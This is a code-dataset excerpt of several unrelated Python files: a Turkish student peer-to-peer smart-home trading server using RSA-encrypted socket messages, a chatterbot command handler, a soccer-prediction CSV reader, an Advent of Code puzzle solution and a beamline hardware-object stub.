self.tQueue.put(\"RN\")\r\n else:\r\n self.tQueue.put(dataInByte.decode())\r\n\r\n # elif parsedData[0] == \"IG\":\r\n elif dataInByte[0:2] == \"IG\".encode():\r\n data = dataInByte.decode()\r\n\r\n parsedData = dataInByte.decode().split(\":\")\r\n if(len(parsedData)>1):\r\n self.uuid2 = parsedData[1]\r\n if int(self.uuid1) == int(self.uuid2):\r\n print(\"olduuu\")\r\n self.istemciDurum = True\r\n self.istemciID=int(self.uuid1)\r\n self.abonelikFihristi[int(self.istemciID)]=[None,None,None,None] # 1. value: abone_mi\r\n # 2. value: ben_ona_abone_mi\r\n # 3. value: bende_engellemi(self.komsuFihristi[int(self.kullanici_uuid)][5])\r\n # 4. value: ben_onda_engellimi\r\n\r\n self.komsuFihristi[int(parsedData[1])]=[parsedData[2], parsedData[3], parsedData[4], parsedData[5],\r\n parsedData[6], parsedData[7],parsedData[8],parsedData[9] ]\r\n self.kisi_var_mi=True\r\n self.tQueue.put(\"OG:\" + str(self.uuid))\r\n else:\r\n self.tQueue.put(\"RN\")\r\n elif(len(parsedData)==1):\r\n self.tQueue.put(\"OG\" +str(self.uuid))\r\n else:\r\n self.tQueue.put(\"RN\")\r\n\r\n\r\n elif dataInByte[0:2] == \"HE\".encode():\r\n data = dataInByte.decode()\r\n\r\n parsedData = dataInByte.decode().split(\":\")\r\n self.tQueue.put(data + \":\" + str(self.uuid))\r\n\r\n\r\n # elif parsedData[0] == \"PK\" and self.istemciDurum == True:\r\n elif dataInByte[0:2] == \"PK\".encode() and self.istemciDurum == True:\r\n data = dataInByte.decode()\r\n\r\n parsedData = dataInByte.decode().split(\":\")\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True):\r\n self.tQueue.put(\"RN\")\r\n else:\r\n\r\n self.tQueue.put(\"PK:\" + str(self.my_public_Key.n) + \":\" + str(self.my_public_Key.e)) # pubk (n,e)\r\n if parsedData[1] != None or parsedData[2] != None:\r\n self.kullanici_publickey = rsa.key.PublicKey(int(parsedData[1]), int(parsedData[2]))\r\n else:\r\n self.kullanici_publickey = None\r\n self.tQueue.put(\"PN\")\r\n\r\n # elif parsedData[0] == \"PT\" and self.istemciDurum == True:\r\n elif dataInByte[0:2] == \"PT\".encode() and self.istemciDurum == True:\r\n\r\n sifreliMetin = dataInByte[3:].strip()\r\n print(self.komsuFihristi)\r\n\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True):\r\n self.tQueue.put(\"RN\")\r\n else:\r\n decrypt_uuid = rsa.decrypt(sifreliMetin, self.my_private_key)\r\n if int(self.uuid) == int(decrypt_uuid.decode()):\r\n if self.kullanici_publickey == None:\r\n self.tQueue.put(\"PO\")\r\n else:\r\n encrypt_kullanici_uuid = rsa.encrypt(str(self.istemciID).encode(),self.kullanici_publickey)\r\n # self.tQueue.put(\"PO:\" + encrypt_kullanici_uuid)\r\n self.csoc.send(\"PO:\".encode() + encrypt_kullanici_uuid)\r\n # self.tQueue.put(\"PO:\".encode() + encrypt_kullanici_uuid)\r\n elif dataInByte[0:8] == \"CO:BEGIN\".encode():\r\n print(\"buraya\")\r\n print(dataInByte)\r\n self.tQueue.put(str(dataInByte.decode()))\r\n # elif data[0:2] == \"CS\":\r\n elif dataInByte[0:2] == \"CS\".encode():\r\n num = int(dataInByte.decode().split(\":\")[1])\r\n if (len(self.komsuFihristi) < num): num = len(self.komsuFihristi)\r\n geoloc = self.komsuFihristi.get(self.istemciID)[5]\r\n counter = 0 # num sayısına varmamız icin tutulan deger\r\n list = []\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True):\r\n self.tQueue.put(\"RN\")\r\n else:\r\n # self.tQueue.put(\"CO:BEGIN\")\r\n for i in self.komsuFihristi:\r\n if (self.komsuFihristi[i][5] == geoloc):\r\n list.append(str(\"CO:\" + str(i) + \":\" + str(self.komsuFihristi[i][0]) + \":\" + str(\r\n self.komsuFihristi[i][1]) + \":\" + str(self.komsuFihristi[i][2]) + \":\" + str(\r\n self.komsuFihristi[i][3]) + \":\" + str(self.komsuFihristi[i][4]) + \":\" + str(self.komsuFihristi[i][5]) + \":\" + str(self.komsuFihristi[i][6] + \":\" + str(self.komsuFihristi[i][7]))))\r\n\r\n counter += 1\r\n if (counter == num):\r\n self.tQueue.put(','.join(list))\r\n print(','.join(list))\r\n break\r\n # self.tQueue.put(\"CO:END\")\r\n elif dataInByte[0:2] == \"AV\".encode():\r\n print(\"gelmis\")\r\n print(dataInByte)\r\n self.tQueue.put(str(dataInByte.decode()))\r\n\r\n # elif parsedData[0] == \"MS\" and self.istemciDurum == True:\r\n elif dataInByte[0:2] == \"MS\".encode() and self.istemciDurum == True:\r\n sifreliMetin = dataInByte[3:].strip()\r\n\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True):\r\n self.tQueue.put(\"RN\")\r\n else:\r\n decrypt_message = rsa.decrypt(sifreliMetin, self.my_private_key)\r\n self.screenQueue.put(decrypt_message.decode())\r\n self.tQueue.put(\"MO\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \"\"\"data = dataInByte.decode()\r\n parsedData = data.split(\":\")\r\n print(self.komsuFihristi)\r\n\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True or self.abonelikFihristi[int(self.istemciID)][3] == True):\r\n self.tQueue.put(\"RN\")\r\n # elif (): #publicKeyFihristi:{key,uid,value,publickey}\r\n # self.tQueue.put(\"PN\") #oldugunu dusunurek kontrol yapildi)\r\n else:\r\n self.screenQueue.put(parsedData[1])\r\n self.tQueue.put(\"MO\")\"\"\"\r\n\r\n\r\n # elif data[0:2] == \"BL\" and self.istemciDurum == True:\r\n elif dataInByte[0:2] == \"BL\".encode() and self.istemciDurum == True:\r\n sifreliMetin = dataInByte[3:].strip()\r\n decrypt_message = rsa.decrypt(sifreliMetin, self.my_private_key)\r\n if (decrypt_message.decode() == \"T\" and self.abonelikFihristi[self.istemciID][3] != True): # kişinin engellenmesi\r\n self.abonelikFihristi[self.istemciID][3] = True # abonelik Fihristindeki engelli olma durumunu güncellemek için kullanılır\r\n self.tQueue.put(\"BOT\")\r\n if (self.abonelikFihristi[self.istemciID][0] == True): # onun üyeğinden çıkıyorum (0. parametre onun bana üye olması\r\n self.abonelikFihristi[self.istemciID][0] = False\r\n print(\"engellendin\")\r\n elif decrypt_message.decode() == \"T\" and self.abonelikFihristi[self.istemciID][3] == True: # kişi engelli olduğu halde engellenmesi\r\n self.tQueue.put(\"RNBT\")\r\n elif (decrypt_message.decode() == \"F\" and self.abonelikFihristi[self.istemciID][3] == True): # kişinin engelinin kaldırılması\r\n self.abonelikFihristi[self.istemciID][3] = False\r\n self.tQueue.put(\"BOF\")\r\n print(\"engelin kaldırıldı\")\r\n elif decrypt_message.decode() == \"F\" and self.abonelikFihristi[self.istemciID][3] == None: # kişi engellenmeden engelin kaldırılma durumu\r\n self.tQueue.put(\"RNBB\")\r\n elif decrypt_message.decode() == \"F\" and self.abonelikFihristi[self.istemciID][3] == False: # kişinin engeli kaldırıldığı halde engelin kaldırılma istği gelmesi\r\n self.tQueue.put(\"RNBF\")\r\n else:\r\n print(\"pass tayım\")\r\n pass\r\n print(self.abonelikFihristi)\r\n # elif data[0:2] == \"SB\" and self.istemciDurum == True:\r\n elif dataInByte[0:2] == \"SB\".encode() and self.istemciDurum == True:\r\n sifreliMetin = dataInByte[3:].strip()\r\n decrypt_message = rsa.decrypt(sifreliMetin, self.my_private_key)\r\n if self.abonelikFihristi[int(self.istemciID)][2] == True:\r\n self.tQueue.put(\"RN\")\r\n # elif (self.publicKeyFihristi[i][3] == self.kullanici_publickey):\r\n # self.tQueue.put(\"PN\")\r\n else:\r\n if (decrypt_message.decode() == \"T\" and self.abonelikFihristi[int(self.istemciID)][0]!=True): # üye olma durumu, kaynakta gelen mesaj: SB:{T}\r\n self.abonelikFihristi[int(self.istemciID)][0] = True\r\n print(str(self.istemciID) + \": eklendi\")\r\n self.tQueue.put(\"SO\")\r\n elif(decrypt_message.decode() == \"T\" and self.abonelikFihristi[int(self.istemciID)][0]==True):\r\n self.tQueue.put(\"RNUT\")\r\n elif (decrypt_message.decode() == \"F\" and self.abonelikFihristi[int(self.istemciID)][0] == True): # üyelikten cıkma durumu, kaynakta gelen mesaj: SB:{F}\r\n # üye olmadan üyelikten çıkılmaz kontrolü yapılıyor\r\n self.abonelikFihristi[int(self.istemciID)][0] = False\r\n self.tQueue.put(\"SO\")\r\n print(str(self.istemciID) + \": cıktı\")\r\n elif (decrypt_message.decode() == \"F\" and self.abonelikFihristi[int(self.istemciID)][0] == False):\r\n self.tQueue.put(\"RNUF\")\r\n elif (decrypt_message.decode() == \"F\" and self.abonelikFihristi[int(self.istemciID)][0] == None):\r\n self.tQueue.put(\"RNUO\")\r\n else:\r\n pass # yanlis parametre verilmis, komut hatasi mesaji geri gitsin (ER\r\n print(self.abonelikFihristi)\r\n\r\n # elif data[0:2] == \"QU\":\r\n elif dataInByte[0:2] == \"QU\".encode() and self.istemciDurum == True:\r\n data = dataInByte.decode()\r\n parsedData = dataInByte.decode().split(\":\")\r\n self.tQueue.put(\"BY\")\r\n\r\n elif dataInByte[0:2] == \"DM\".encode():\r\n sifreliMetin = dataInByte[3:]\r\n decrypt_message = rsa.decrypt(sifreliMetin, self.my_private_key)\r\n data = decrypt_message.decode()\r\n parsedData = data.split(\":\")\r\n\r\n if self.abonelikFihristi[int(self.istemciID)][2] == True:\r\n self.tQueue.put(\"RN\")\r\n elif parsedData[0] == \"N\":\r\n kayitSayisi = parsedData[1]\r\n kayitSayisi = int(kayitSayisi)\r\n if kayitSayisi > len(self.talepFihristi):\r\n kayitSayisi = len(self.talepFihristi)\r\n gonderArray = []\r\n gonderArray.append(\"DO:BEGIN\")\r\n counter = 0\r\n for i in self.talepFihristi:\r\n gonderArray.append(\r\n \"DO:\" + str(i) + \":\" + str(self.talepFihristi[i][0]) + \":\" + str(self.talepFihristi[i][1]) + \":\"\r\n + str(self.talepFihristi[i][2]) + \":\" + str(self.talepFihristi[i][3]) + \":\" +\r\n str(self.talepFihristi[i][4]) + \":\" + str(self.talepFihristi[i][5]))\r\n counter=counter+1\r\n if counter == kayitSayisi:\r\n break\r\n gonderArray.append(\"DO:END\")\r\n gonderString = \"\"\r\n for i in range(len(gonderArray)):\r\n if gonderArray[i] != \"DO:END\":\r\n gonderString = gonderString + gonderArray[i]+\",\"\r\n else:\r\n gonderString = gonderString + gonderArray[i]\r\n self.tQueue.put(gonderString)\r\n elif parsedData[0] == \"K\":\r\n # kullanım: talepFihristi[talep uid] = [talep adı, talep birimi, talep miktarı, karşılık adı, karşılık birimi, azami(max) karşılık miktarı]\r\n keyword = parsedData[1]\r\n gonderArray = []\r\n gonderArray.append(\"DO:BEGIN\")\r\n for i in self.talepFihristi:\r\n if keyword == self.talepFihristi[i][0]:\r\n gonderArray.append(\"DO:\"+ str(i) + \":\" +str(self.talepFihristi[i][0]) + \":\" + str(self.talepFihristi[i][1]) + \":\"\r\n + str(self.talepFihristi[i][2])+ \":\" + str(self.talepFihristi[i][3])+ \":\" +\r\n str(self.talepFihristi[i][4])+ \":\" + str(self.talepFihristi[i][5]))\r\n gonderArray.append(\"DO:END\")\r\n gonderString = \"\"\r\n for i in range(len(gonderArray)):\r\n if gonderArray[i] != \"DO:END\":\r\n gonderString = gonderString + gonderArray[i] + \",\"\r\n else:\r\n gonderString = gonderString + gonderArray[i]\r\n self.tQueue.put(gonderString)\r\n else:\r\n self.tQueue.put(\"RN\")\r\n\r\n\r\n\r\n elif dataInByte[0:2] == \"TR\".encode():\r\n\r\n type = dataInByte.decode().split(\":\")[1]\r\n\r\n uuid = dataInByte.decode().split(\":\")[2]\r\n\r\n clientFiyat = int(dataInByte.decode().split(\":\")[6]) / int(dataInByte.decode().split(\":\")[4])\r\n\r\n if (type == \"A\"):\r\n\r\n serverTalepFiyat = int(self.talepFihristi.get(int(uuid))[5]) / int(self.talepFihristi.get(int(uuid))[2])\r\n\r\n if (clientFiyat >= serverTalepFiyat):\r\n\r\n clientAdet = dataInByte.decode().split(\":\")[4]\r\n\r\n serverAdet = self.talepFihristi.get((int(uuid)))[2]\r\n\r\n if (float(clientAdet) >= float(serverAdet)):\r\n\r\n del self.talepFihristi[int(uuid)]\r\n\r\n print(self.talepFihristi)\r\n\r\n else:\r\n\r\n serverAdet = float(serverAdet) - float(clientAdet)\r\n\r\n self.talepFihristi.get(int(uuid))[2] = serverAdet\r\n\r\n self.talepFihristi.get(int(uuid))[5] = serverTalepFiyat * serverAdet\r\n\r\n print(self.talepFihristi)\r\n\r\n self.tQueue.put(str(dataInByte.decode()).replace(\"TR:\", \"TO:\"))\r\n\r\n else:\r\n\r\n self.tQueue.put(\"TN\")\r\n\r\n if (type == \"T\"):\r\n\r\n serverArzFiyat = int(self.arzFihristi.get((int(uuid)))[5]) / int(self.arzFihristi.get((int(uuid)))[2])\r\n\r\n if (clientFiyat >= serverArzFiyat):\r\n\r\n clientAdet = dataInByte.decode().split(\":\")[4]\r\n\r\n serverAdet = self.arzFihristi.get((int(uuid)))[2]\r\n\r\n if (float(clientAdet) <= float(serverAdet)):\r\n\r\n del self.arzFihristi[int(uuid)]\r\n\r\n else:\r\n\r\n serverAdet = float(serverAdet) - float(clientAdet)\r\n\r\n self.arzFihristi.get(int(uuid))[2] = float(serverAdet)\r\n\r\n self.arzFihristi.get(int(uuid))[5] = float(serverArzFiyat) * float(serverAdet)\r\n\r\n self.tQueue.put(str(dataInByte.decode()).replace(\"TR:\", \"TO:\"))\r\n\r\n else:\r\n\r\n self.tQueue.put(\"TN\")\r\n\r\n\r\n\r\n elif dataInByte[0:2] == \"OF\".encode():\r\n sifreliMetin = dataInByte[3:]\r\n decrypt_message = rsa.decrypt(sifreliMetin, self.my_private_key)\r\n data = decrypt_message.decode()\r\n parsedData = data.split(\":\")\r\n if self.abonelikFihristi[int(self.istemciID)][2] == True:\r\n self.tQueue.put(\"RN\")\r\n elif parsedData[0] == \"N\":\r\n kayitSayisi = parsedData[1]\r\n kayitSayisi = int(kayitSayisi)\r\n if kayitSayisi > len(self.arzFihristi):\r\n kayitSayisi = len(self.arzFihristi)\r\n gonderArray = []\r\n gonderArray.append(\"OO:BEGIN\")\r\n counter = 0\r\n for i in self.arzFihristi:\r\n gonderArray.append(\"OO:\" + str(i) + \":\" + str(self.arzFihristi[i][0]) + \":\" + str(self.arzFihristi[i][1]) + \":\"\r\n + str(self.arzFihristi[i][2]) + \":\" + str(self.arzFihristi[i][3]) + \":\" +\r\n str(self.arzFihristi[i][4]) + \":\" + str(self.arzFihristi[i][5]))\r\n counter=counter+1\r\n if counter == kayitSayisi:\r\n break\r\n gonderArray.append(\"OO:END\")\r\n gonderString = \"\"\r\n for i in range(len(gonderArray)):\r\n if gonderArray[i] != \"OO:END\":\r\n gonderString = gonderString + gonderArray[i] + \",\"\r\n else:\r\n gonderString = gonderString + gonderArray[i]\r\n self.tQueue.put(gonderString)\r\n elif parsedData[0] == \"K\":\r\n # kullanım: arzFihristi[talep uid] = [arz adı, arz birimi, arz miktarı, karşılık adı, karşılık birimi, azami(max) karşılık miktarı]\r\n keyword = parsedData[1]\r\n gonderArray = []\r\n gonderArray.append(\"OO:BEGIN\")\r\n for i in self.arzFihristi:\r\n if keyword == self.arzFihristi[i][0]:\r\n gonderArray.append(\"OO:\" + str(i) + \":\" + str(self.arzFihristi[i][0]) + \":\" + str(self.arzFihristi[i][1]) + \":\"\r\n + str(self.arzFihristi[i][2]) + \":\" + str(self.arzFihristi[i][3]) + \":\" +\r\n str(self.arzFihristi[i][4]) + \":\" + str(self.arzFihristi[i][5]))\r\n gonderArray.append(\"OO:END\")\r\n gonderString = \"\"\r\n for i in range(len(gonderArray)):\r\n if gonderArray[i] != \"OO:END\":\r\n gonderString = gonderString + gonderArray[i] + \",\"\r\n else:\r\n gonderString = gonderString + gonderArray[i]\r\n self.tQueue.put(gonderString)\r\n else:\r\n self.tQueue.put(\"RN\")\r\n else:\r\n self.tQueue.put(\"ER\")\r\n\r\n def run(self):\r\n while True:\r\n incoming_data = self.csoc.recv(1024)\r\n self.parser(incoming_data.strip())\r\n if (incoming_data.strip()[0:2] == \"QU\".encode()):\r\n print(\"read thread server QU dasın \")\r\n break\r\n\r\n self.lQueue.put(\"Read thread server sonlandirildi \")\r\n\r\n\r\n\r\n\r\nclass ServerThread(threading.Thread):\r\n def __init__(self, uuid, ip, port, screenQueue, talepFihristi, arzFihristi, komsuArzFihristi, komsuTalepFihristi, komsuFihristi,\r\n abonelikFihristi, my_public_key, my_private_key,lQueue):\r\n threading.Thread.__init__(self)\r\n self.talepFihristi = talepFihristi\r\n self.arzFihristi = arzFihristi\r\n self.komsuArzFihristi = komsuArzFihristi\r\n self.komsuFihristi = komsuFihristi\r\n self.komsuTalepFihristi = komsuTalepFihristi\r\n self.abonelikFihristi = abonelikFihristi\r\n self.s = socket.socket()\r\n self.screenQueue = screenQueue\r\n self.ip = ip\r\n self.port = int(port)\r\n self.my_public_key = my_public_key\r\n self.my_private_key = my_private_key\r\n self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,\r\n 1) # bunu port'u tekrar kullanabilmek için yazdım. yoksa OS boşaltana kadar bayağı bekliyorsunuz serverı başlatırken.\r\n self.s.bind((self.ip, self.port))\r\n self.s.listen()\r\n self.uuid = uuid\r\n self.lQueue=lQueue\r\n def run(self):\r\n while True:\r\n c, addr = self.s.accept()\r\n self.lQueue.put(addr)\r\n self.lQueue.put(\"yeni baglanti eklendi \")\r\n\r\n # fakat tqueue, write thread ve read thread her kullanıcı için unique olmalı. bu yüzden onları burada yaratıp başlatıyoruz.\r\n\r\n yeniThreadQueue = queue.Queue()\r\n\r\n yeniWriteThreadServer = WriteThreadServer(c, addr, yeniThreadQueue,self.lQueue)\r\n yeniReadThreadServer = ReadThreadServer(self.uuid,self.ip , self.port,c, addr, self.screenQueue, yeniThreadQueue,\r\n self.komsuFihristi, self.abonelikFihristi, self.talepFihristi, self.arzFihristi, self.komsuArzFihristi, self.komsuTalepFihristi,\r\n self.my_public_key, self.my_private_key,self.lQueue)\r\n\r\n yeniWriteThreadServer.start()\r\n yeniReadThreadServer.start()\r\n\r\n\r\ndef main():\r\n fname = \"logTXT.txt\"\r\n\r\n\r\n\r\n\r\n lQueue = queue.Queue()\r\n l = LogThread(lQueue, fname)\r\n l.start()\r\n\r\n uuid = 12\r\n # port range= 1025 47808/\r\n # buradadaki degiskenler grub uyeleri kendileri manuel olarak degistirmeli kendine uyarliyip simulasion yapabilmek icin\r\n host = \"0.0.0.0\"\r\n port = 3006\r\n sistemTipi = 'A'\r\n geoloc = \"kordinat\"\r\n kullaniciAdi = \"A\"\r\n\r\n # Public / Private Key tanımlamaları\r\n (my_public_key, my_private_key) = rsa.newkeys(256)\r\n\r\n # tutacağımız data.\r\n talepFihristi = {\r\n 103: [\"Ayva\", \"KG\", 3, \"para\", \"TL\", 15],\r\n 104: [\"Armut\", \"KG\", 4, \"elma\", \"kg\", 5],\r\n 105: [\"Uzum\", \"KG\", 6, \"para\", \"TL\", 25]\r\n } # talepler her sistem için 1 tane olacaktır. istemci bazında olmayacaktır.\r\n # kullanım: talepFihristi[talep uid] = [talep adı, talep birimi, talep miktarı, karşılık adı, karşılık birimi, azami(max) karşılık miktarı]\r\n arzFihristi = {\r\n 102: [\"Karpuz\", \"KG\", 3, \"para\", \"TL\", 15], # 5\r\n 106: [\"Sabun\", \"LT\", 3, \"para\", \"TL\", 15], # 5\r\n 107: [\"Seftali\", \"KG\", 4, \"elma\", \"kg\", 5],\r\n 108: [\"Nektari\", \"KG\", 6, \"para\", \"TL\", 25]\r\n } # arzlar her sistem için 1 tane olacaktır. istemci bazında olmayacaktır.\r\n # kullanım: arzFihristi[arz uid] = [arz adı, arz birimi, arz miktarı, karşılık adı, karşılık birimi, asgari(min) karşılık miktarı]\r\n komsuTalepFihristi = {} # diğer sistemlerin talep listesi burada toplu şekilde tutulacaktır. sistemin kendi arz/talep fihristleriyle aynı yapıda yapalım ki\r\n # bir karmaşa olmasın. böylece karşılaştırma yaparken kodlaması daha kolay olur. ayrıca bunlar güncel olmayabilir. bir sistemin bir\r\n # komşusunun listesi değişmiş olabilir. bu fihrist için ilgili öğrenci bir güncelleme fonksiyonu yazmalıdır. zaman ayarlı güncelleme olabilir.\r\n komsuArzFihristi = {} # komsuTalepFihristi ile aynı şeyler bunun için de geçerlidir.\r\n komsuFihristi = { 3: [\"0.0.0.0\", 2266, None, 8, 9, \"kordinat\", \"Mert\", \"A\"],\r\n 4: [\"0.0.0.0\", 2267, None, 10, 11, \"kordinat\", \"Süheyla\", \"A\"],\r\n 1: [\"0.0.0.0\", 2268,None, 12, 13, \"kordinat\", \"Beyza\", \"A\"]}\r\n\r\n # ev sistemi tanıdığı başka evleri bu fihristte tutacaktır.\r\n # kullanım: komsuFihristi[komsuUid] = [ip ve port, en son kontrol zamanı, public key, gps koordinatları, tanıtıcı mesaj, cinsi(A/B), tanışıklık durumu]\r\n # bu bilgilerin selamlaşma ve tanışma aşamasında güncelleneceği ilgili öğrenci tarafından unutulmamalıdır.\r\n # burada üyelik parametresini koymadım. hocanın örneğinde değişikliğe gidiyoruz. abonelik sistemini başka şekilde tutacağız sistemi yormamak için\r\n # ayrıca tanışıklık durumu diye bir parametre koydum. hoca derste tanışıklığın 0-1-2 diye 3 aşamadan oluşacağını, bu durumların da tutulması\r\n # gerektiğini söylemişti. bu parametresi 2 olan, yani bütün tanışıklık adımlarını tamamlayan kullanıcıyla ancak alışveriş başlatılabilir.\r\n # alışverişle ilgili öğrenci bu hususu unutmasın.\r\n\r\n abonelikFihristi = { 3: [True, True, True, True],\r\n 4: [False, False, False, False],\r\n 1: [True, True, True, True]} # bu dictte sistem kendine abone olan ve kendinin abone olduğu komşularını tutacaktır.\r\n # kullanımı: abonelikFihristi[komsuUid] = [bana abone mi? (bool), ben ona abone miyim? (bool), bende engelli mi?, ben onda engelli miyim?]\r\n # bu sistemle hem her abonelik işleminde komsuArzFihristi'ni taramamış olacağız, hem aboneleri ve abone olunanları tek fihristte\r\n # tutacağız hem de aynı anda karşılıklı abonelik durumunda aynı kullanıcıya ait 2 data yaratmamış olacağız. ayrıca\r\n # burada da identifier komsuUid olduğunu kaçırmamak gerekir. bunun sayesinde kolayca komsuFihristi'ne de o kullanıcı icin ulaşılabilecek\r\n # ve işlem yapılabilecektir. en azından ben böyle düşündüm.\r\n screenQueue = queue.Queue()\r\n serverth = ServerThread(uuid, host, port, screenQueue, talepFihristi, arzFihristi, komsuArzFihristi, komsuTalepFihristi, komsuFihristi,\r\n abonelikFihristi, my_public_key, my_private_key,lQueue)\r\n lQueue.put(\"Peer server kismi baslatildi\")\r\n serverth.start()\r\n app = ClientDialog(talepFihristi, arzFihristi, komsuArzFihristi, komsuTalepFihristi, komsuFihristi, abonelikFihristi, uuid, host, port,\r\n screenQueue,\r\n sistemTipi, geoloc, kullaniciAdi, my_public_key, my_private_key,lQueue)\r\n lQueue.put((\"Arayuz baslatildi\"))\r\n\r\n app.run()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\n","sub_path":"Smart-Home-System/deneme1.py","file_name":"deneme1.py","file_ext":"py","file_size_in_byte":71599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"610240591","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom chatterbot import ChatBot\n\n\nclass Command:\n \"\"\" Handle user input and commands.\n \"\"\"\n\n def __init__(self, bot=None, bot_dict=None):\n self._prefix = '@tellme'\n self._user_in = None\n self._bot = bot\n self._bot_dict = bot_dict if isinstance(bot_dict, dict) else {}\n self._error = None\n\n def user_in(self, q=''):\n \"\"\" Remove prefix from the user input and convert it to the list.\n \"\"\"\n user_in = q.split()\n if len(user_in) > 1 and user_in[0]==self._prefix:\n self._user_in = user_in[1:]\n else:\n self._error = 'Please use \"​%s\" prefix with all the input.\\n' % self._prefix\n return self._user_in\n\n @property\n def bot(self):\n return self._bot\n\n @property\n def error(self):\n return self._error\n\n @property\n def _commands(self):\n \"\"\" Known commands.\n \"\"\"\n return {'help': self.bot_help,\n 'list': self.bot_list,\n 'start_session': self.start_session,\n 'end_session': self.end_session}\n\n def run(self, q=''):\n \"\"\" If user input seems valid, then call appropriate handler function.\n \"\"\"\n commands = self._commands\n user_in = self.user_in(q=q)\n if user_in and user_in[0] in commands:\n return commands[user_in[0]]()\n elif user_in and self._bot:\n return self.bot_response()\n else:\n self._error = 'Unknown command...'\n\n# --- Handler functions\n\n def bot_help(self, *a, **kw):\n \"\"\" Print basic help.\n \"\"\"\n msg = 'Please use \"​%s\" prefix with all the input.\\n' % self._prefix\n msg += 'Available Bot commads are:\\n'\n for x in self._commands:\n msg += str('- %s %s\\n' % (self._prefix, x))\n return msg\n\n def bot_list(self, *a, **kw):\n \"\"\" Display Bot list.\n \"\"\"\n msg = 'Currently online:\\n'\n return msg + '\\n'.join('- %s' % b for b in self._bot_dict)\n\n def start_session(self, *a, **kw):\n \"\"\" Starting the session is nothing more than selecting the valid Bot instance.\n \"\"\"\n user_in = self._user_in\n if user_in and len(user_in) > 1:\n bot = ' '.join(self._user_in[1:])\n if bot in self._bot_dict:\n self._bot = self._bot_dict[bot]\n assert isinstance(self._bot, ChatBot),\\\n 'Must be an instance of chatterbot.ChatBot'\n return 'Selected \"%s\" for this session.' % self._bot.name\n else:\n self._error = 'Bot \"%s\" does not exist, sorry :/' % bot\n else:\n self._error = \"You've forgotten to specify Bot name\"\n\n def end_session(self, *a, **kw):\n \"\"\" Session is invalidated when there's no Bot selected.\n \"\"\"\n self._bot = None\n return 'Session ended.'\n\n def bot_response(self, *a, **kw):\n \"\"\" Return Bot response to the question.\n \"\"\"\n bot = self._bot\n user_in = ' '.join(self._user_in)\n if not self._bot:\n self._error = \"Please choose a Bot\"\n # Get a response to an input statement\n try:\n bot_response = bot.get_response(user_in)\n except Exception as e:\n self._error = e\n print(e)\n else:\n return bot_response.text","sub_path":"rtmbot/app/plugins/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"290467498","text":"\"\"\"\nThis module reads a file containing predictions.\nFirst line in the file contains the names of columns, including\nnames of players\nRemaining lines contain each a soccer game, real score, followed by\nthe predicted scores by each player\n\nExample first line:\n\nNr.,Date,Group,Side A,Side B,REAL,REAL,Eleven,Eleven,Dustin,Dustin\n\nExample game line:\n\n2,11-Jun,A,Albania,Switzerland,0,1,0,1,0,1\n\"\"\"\n\nimport csv\n\ndef read_predictions(filename):\n \"\"\" Returns three lists\n\n games: list of tuples, each containing information for a game of\n the form: (1, '10-Jun', 'A', 'France', 'Romania', 2, 1)\n The last two items is the score of the game for first\n and second teams\n\n players: list of strings containing name of players\n \n predictions: list of lists,\n each list is for a different player and contains\n one tuple for each game of the form: (x,y) \n where x,y are the scores for the first and second teams\n \"\"\"\n lineno = 0\n data = []\n filereader = csv.reader(open(filename, 'rU', encoding=\"utf-8\"), delimiter=\",\", quotechar='\"')\n games = []\n players = []\n predictions = []\n for line in filereader:\n lineno += 1\n if lineno == 1:\n for i in range(7, len(line),2):\n players.append( line[i] )\n predictions.append( [] )\n continue\n games.append( (int(line[0]),line[1],line[2],line[3],line[4],int(line[5]), int(line[6])) )\n j = 0\n for i in range(7, len(line),2):\n predictions[j].append( (int(line[i]),int(line[i+1])) )\n j += 1\n return games, players, predictions\n\n\nif __name__ == \"__main__\":\n games, players, predictions = read_predictions('predictions_short.txt')\n print (games)\n print (players)\n print (predictions)\n","sub_path":"Homework/Homework 5/hw5util.py","file_name":"hw5util.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"620657523","text":"import csv\n#import pdb\n\n#pdb.set_trace()\no = []\nwith open('input.txt') as f:\n\tcsvr = csv.reader(f, delimiter=\" \")\n\tfor row in csvr:\n\t\tx = row[1] # Step X must be finished\n\t\ty = row[7] # before step Y can begin.\n\t\tinserted = False\n\t\tif x not in o: o.append(x)\n\t\tif y in o:\n\t\t\tif o.index(x) > o.index(y): # if X is not finished before Y\n\t\t\t\to.remove(y)\n\t\t\telse: # if X is finished before Y already leave order as is\n\t\t\t\tprint(o, ' '.join(row))\n\t\t\t\tcontinue\n\t\tfor l in o[o.index(x)+1:]:\n\t\t\tif y < l:\n\t\t\t\to.insert(o.index(l),y)\n\t\t\t\tinserted = True\n\t\t\t\tbreak\n\t\tif inserted == False: o.append(y)\n\t\tprint(o, ' '.join(row))\n\nprint(\"final order:\", ''.join(o), \"letter count:\", len(o))\n","sub_path":"Day 7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"276409557","text":"import logging\nimport sys\n\nfrom HardwareRepository.BaseHardwareObjects import HardwareObject\n\nclass Beamline(HardwareObject):\n def __init__(self, name):\n HardwareObject.__init__(self, name)\n self._shutters = {}\n self.energy = None\n self.machine_info = None\n\n\n def init(self):\n try:\n for role in self[\"shutters\"].getRoles():\n self._shutters[role] = self[\"shutters\"].getObjectByRole(role)\n except KeyError:\n pass\n\n roles = [\"energy\", \"machine_info\"]\n\n self.energy = self.getObjectByRole(\"energy\")\n self.machine_info = self.getObjectByRole(\"machine_info\")\n\n optional = self.getProperty(\"optional\").strip().split(\",\")\n\n for role in roles:\n ho = self.getObjectByRole(role)\n\n if not ho and role not in optional:\n logging.error(\"No HardwareObject with role %s\", role)\n 